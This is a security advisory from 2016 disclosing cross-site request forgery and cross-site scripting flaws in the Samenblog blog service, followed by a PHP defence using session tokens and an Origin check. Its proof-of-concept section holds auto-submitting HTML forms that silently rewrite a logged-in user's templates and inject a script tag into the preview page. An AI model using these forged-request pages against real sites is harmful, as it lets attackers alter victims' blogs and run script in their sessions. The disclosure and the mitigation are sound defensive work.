Document Title:
===============
SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting
References (Source):
====================
http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt
Release Date:
=============
2016-02-20
Product & Service Introduction:
===============================
Samenblog lets its users publish their writing, memories, essays and
other content through a professional weblog-publishing system with a
simple interface, and aims to serve both professional and amateur
users.
Vulnerability Type:
===================
Cross Site Request Forgery
Cross Site Scripting
Vulnerability Details:
======================
I discovered a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability in
Samenblog.com (Weblog Service).
Author:
=======
Ehsan Hosseini
http://ehsansec.ir/
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery --
-- PoC : Edit Themes --
-- PoC 1 --
<html>
<head>
<title>Edit Weblog Template - Csrf</title>
</head>
<body onload="document.info.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='info'>
<input type="hidden" name="template" value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doedit'>
</form>
</body>
</html>
-- PoC 2 --
<html>
<head>
<title>Edit The extra pages templates - Csrf</title>
</head>
<body onload="document.infoo.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infoo'>
<input name='templatepage' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditpage'>
</form>
</body>
</html>
-- PoC 3 --
<html>
<head>
<title>Edit The archive templates - Csrf</title>
</head>
<body onload="document.infooo.submit()">
<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infooo'>
<input name='templatearchive' value="<h1> PoC </h1>">
<input type='hidden' name='task' value='doeditarchive'>
</form>
</body>
</html>
-- Cross Site Scripting --
<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.preview.submit()">
<form action='http://samenblog.com/cpanel/preview.php' method='POST'
name='preview'>
<input name='templatearchive' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>
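As an added example (not Samenblog's code), this is how the cpanel handlers could reject the cross-site form posts shown above: a per-session token compared in constant time, an Origin header check, and a SameSite session cookie. The function names and the csrf_token field are assumptions.

```php
<?php
// Added example, not Samenblog's code: CSRF protection for state-changing
// cpanel handlers (edit_template.php, preview.php). Field and function
// names are assumptions.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Lax',  // browsers then omit the cookie on cross-site POSTs
]);

// One random token per session, embedded in every legitimate cpanel form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Primary control: constant-time token comparison. Secondary control: if an
// Origin header is present it must name this host (the PoC pages above post
// from a foreign origin, so they fail both checks).
function csrf_valid(array $post, array $server, string $expected): bool
{
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || $token === '' || !hash_equals($expected, $token)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = strtolower((string) parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST));
        $ownHost    = strtolower(explode(':', $server['HTTP_HOST'] ?? '')[0]);
        if ($originHost === '' || $originHost !== $ownHost) {
            return false;
        }
    }
    return true;
}

// At the top of edit_template.php and preview.php, before reading 'task'
// or any 'template*' field:
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_valid($_POST, $_SERVER, csrf_token())) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
// ... existing handling of task=doedit / doeditpage / doeditarchive ...

// In the cpanel form templates:
echo '<input type="hidden" name="csrf_token" value="'
    . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
```

Applying the same check to preview.php also neutralises the reflected script, because the submitted template is then only rendered for a request that the user's own cpanel page initiated.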
Contact:
========
hehsan979@gmail.com
info@ehsansec.ir